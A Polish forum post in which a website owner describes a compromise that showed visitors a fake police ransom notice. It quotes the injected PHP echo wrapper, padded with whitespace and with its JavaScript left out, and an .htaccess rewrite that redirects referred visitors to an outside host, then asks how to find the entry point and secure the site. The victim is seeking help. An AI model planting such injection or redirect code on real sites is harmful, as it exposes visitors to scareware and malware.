Witam,

moja witryna została zaatakowana. Kaspersky wykrył: http://www.securelist.com/en/descrip...Script.Generic
U osób bez zabezpieczonego systemu pojawiała się fałszywa informacja Policji namawiająca do zapłacenia kary.

Zapoznałem się z listą kroków po włamaniu. Skrypt pokazał, że dwóch dni były modyfikowane praktycznie cały czas pliki *.jpg. Sam zauważyłem, że jeden z folderów po prostu zniknął.

Z plików php zauważyłem, że modyfikowane były wyłącznie indexy katalogów z layoutami. Został do nich wstrzyknięty dziwny kod, zawierający bardzo dużo jakiś liczb, zaczynający się i kończący tagami
Kod:
<?#336988#
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  echo "                                                                                                                                                                                                                                                                                                                                                                                                                                                                  <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                                                                                                                                                                                                                                  

[tutaj cała reszta, nie wklejam celowo, bo kaspersky traktuje to od razu jako wirus]

</script>";


#/336988#
?>
Do pliku .htaccess wstrzyknięto coś takiego:

Kod:
#336988#<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(

[tu jakieś dziwne tagi]


RewriteRule ^(.*)$ http://mamazwiara.home.pl/clik.php [R=301,L]
</IfModule>


#/336988#
Ponieważ miałem kopię bezpieczeństwa, którą wykonuję regularnie - otworzenie witryny nie powinno stanowić problemu.

Piszę tutaj ponieważ nie bardzo mam pomysł w jaki sposób dojść do pliku/plików przez które nastąpił atak. Czy ma ktoś jakiś pomysł jak zabezpieczyć się przed kolejnymi?
Kolejną sprawą jest jakie jest prawdopodobieństwo, że osoba dokonująca ataku jest w posiadaniu jakichkolwiek haseł?

Mam słabe pojęcie o tym, mam nadzieję, że podałem wystarczająco informacji, by cokolwiek stwierdzić lub pomóc uchronić się od następnych ataków.